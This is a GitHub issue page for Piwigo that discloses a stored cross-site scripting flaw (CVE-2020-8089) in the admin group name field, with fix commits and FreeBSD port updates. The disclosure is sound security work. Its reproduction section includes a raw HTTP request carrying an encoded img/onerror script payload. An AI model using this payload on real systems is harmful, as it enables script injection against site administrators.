New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Stored Cross-Site Scripting vulnerability in Piwigo CMS #1150
Comments
plegall
added a commit
that referenced
this issue
Feb 7, 2020
plegall
added a commit
that referenced
this issue
Feb 7, 2020
plegall
added a commit
that referenced
this issue
Feb 7, 2020
|
I got CVE-2020-8089 assigned for this vulnerability. |
uqs
pushed a commit
to freebsd/freebsd-ports
that referenced
this issue
May 23, 2020
Changelog: - https://www.piwigo.org/release-2.10.2 - Piwigo/Piwigo#1150 PR: 245153 MFH: 2020Q2 Security: 436d7f93-9cf0-11ea-82b8-4c72b94353b5 Sponsored by: Netzkommune GmbH git-svn-id: svn+ssh://svn.freebsd.org/ports/head@536302 35697150-7ecd-e111-bb59-0022644237b5
uqs
pushed a commit
to freebsd/freebsd-ports
that referenced
this issue
May 23, 2020
Changelog: - https://www.piwigo.org/release-2.10.2 - Piwigo/Piwigo#1150 PR: 245153 MFH: 2020Q2 Security: 436d7f93-9cf0-11ea-82b8-4c72b94353b5 Sponsored by: Netzkommune GmbH
uqs
pushed a commit
to freebsd/freebsd-ports
that referenced
this issue
May 23, 2020
Update to 2.10.2 Changelog: - https://www.piwigo.org/release-2.10.2 - Piwigo/Piwigo#1150 PR: 245153 Security: 436d7f93-9cf0-11ea-82b8-4c72b94353b5 Sponsored by: Netzkommune GmbH Approved by: ports-secteam (with hat)
Jehops
pushed a commit
to Jehops/freebsd-ports-legacy
that referenced
this issue
May 23, 2020
Changelog: - https://www.piwigo.org/release-2.10.2 - Piwigo/Piwigo#1150 PR: 245153 MFH: 2020Q2 Security: 436d7f93-9cf0-11ea-82b8-4c72b94353b5 Sponsored by: Netzkommune GmbH git-svn-id: svn+ssh://svn.freebsd.org/ports/head@536302 35697150-7ecd-e111-bb59-0022644237b5
PatrickCronin
pushed a commit
to PatrickCronin/Piwigo
that referenced
this issue
Jun 10, 2020
It avoids any stored XSS between administrators and it's totally useless to have HTML code in the group name.
PatrickCronin
pushed a commit
to PatrickCronin/Piwigo
that referenced
this issue
Jun 10, 2020
uqs
pushed a commit
to freebsd/freebsd-ports
that referenced
this issue
Apr 1, 2021
Update to 2.10.2 Changelog: - https://www.piwigo.org/release-2.10.2 - Piwigo/Piwigo#1150 PR: 245153 Security: 436d7f93-9cf0-11ea-82b8-4c72b94353b5 Sponsored by: Netzkommune GmbH Approved by: ports-secteam (with hat)
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Description:
Piwigo version 2.10.1 is affected by stored cross site scripting vulnerability. This vulnerability exists in "Group Name" Field in "group_list" page.
How to reproduce:
CVSS Score:
CVSS:3.0/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:N
POST /piwig/admin.php?page=group_list HTTP/1.1
Host: 172.16.163.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 122
Origin: http://172.16.163.1
Connection: close
Cookie: pwg_display_thumbnail=no_display_thumbnail; phavsz=1141x490x1; pwg_id=i6juu2ls6m174g1f0abcjodjs7; user_auth=eyJpdiI6IkxnaGp4T0RGd1BiK2VDUzNWNHpRdlE9PSIsInZhbHVlIjoiU29tK1pzdDQzUDBKcWlRZk5VN04wVUNxR1JXUjdBd1Q5QUtOaUJRbUhyNGVjc0xETWUwWFd0RkpBV2ZJOFBKd3R4N2o2clNTRlhWaWtmc2ttQ2dMM3VrWU0rZ1B5cDJlZnpoUGFCZ2hmaHpJTURTVXJQdCtlbEpyeEp6RzhNUVAiLCJtYWMiOiI4YjY2NTU4N2JhOTc2MzkyZTcwOTQyNWQ3OThkNDZkZjMyODgxYjhjZGQ0NGQ2NTFhMjg3NWRmMzM2OGIwZDYzIn0%3D
groupname=%3Cimg+src%3DX+onerror%3Dalert%28document.domain%29%3E&submit_add=Add&pwg_token=46695f2721b77a2840903ba6298796be
The text was updated successfully, but these errors were encountered: